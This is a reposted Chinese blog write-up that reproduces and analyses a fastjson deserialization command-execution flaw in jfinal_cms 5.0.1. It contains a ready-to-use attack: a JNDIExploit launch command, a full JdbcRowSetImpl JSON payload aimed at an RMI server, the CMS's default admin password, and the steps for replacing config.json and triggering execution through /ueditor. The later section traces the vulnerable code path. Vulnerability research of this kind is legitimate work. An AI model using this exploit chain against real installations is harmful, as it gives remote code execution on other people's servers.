0


Jfinal CMS命令注入漏洞

漏洞环境

jfinal_cms 5.0.1 中存在命令执行漏洞

JDK 版本要求:

  • 基于 RMI<=6u141、7u131、8u121 使用的 JDK 版本
  • 基于 LDAP<=6u211、7u201、8u191 使用的 JDK 版本。

jfinal_cms版本:5.0.1
fastjson版本:1.2.28

漏洞复用

测试中使用的JDK版本:JDK8u101

在 kali 上运行该工具,启动 rmi 和 ldap 服务
https://github.com/feihong-cs/JNDIExploit

java-jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"calc.exe"

2022-11-17T12:30:22.png
替换payload中的rmi或ldap地址,然后保存到

config.json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.248.128:1099/6dxg2x","autoCommit":true}}

登录后台,找到模板管理,后台默认账号密码admin/admin123456
2022-11-17T12:33:58.png
找到config.json并点击,之后点

replace file

2022-11-17T12:35:10.png
把刚才做好的payload上传
2022-11-17T12:35:33.png
访问 /ueditor,就会执行命令并弹出计算器

http://localhost:8080/jfinal_cms/ueditor

136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d.gif
利用成功,散会!

漏洞分析

com.jflyfox.component.controller.Ueditor

ActionEnter

类在

/ueditor

路由的

index

方法中实例化
2022-11-17T12:38:14.png
com.baidu.ueditor.ActionEnter

ActionEnter

类的构造方法中实例化
2022-11-17T12:39:52.png

com.baidu.ueditor.ConfigManager

ConfigManager

调用的构造方法

initEnv()

2022-11-17T12:40:25.png

com.baidu.ueditor.ConfigManager

initEnv

调用

JSONObject.parseObject

来解析文件内容,这里的文件内容是可控的,只需将文件内容替换为payload即可
2022-11-17T12:41:17.png

com.baidu.ueditor.ConfigManager

如果后台存在任何文件上传漏洞,则可以将此文件替换为包含payload的文件,以触发 fastjson 反序列化

WEB-INF/classes/config.json

2022-11-17T12:42:01.png
2022-11-17T12:42:09.png

标签: java 安全 php

本文转载自: https://blog.csdn.net/MoLeft/article/details/128393531
版权归原作者 用砖头敲代码 所有, 如有侵权,请联系我们删除。

“Jfinal CMS命令注入漏洞”的评论:

还没有评论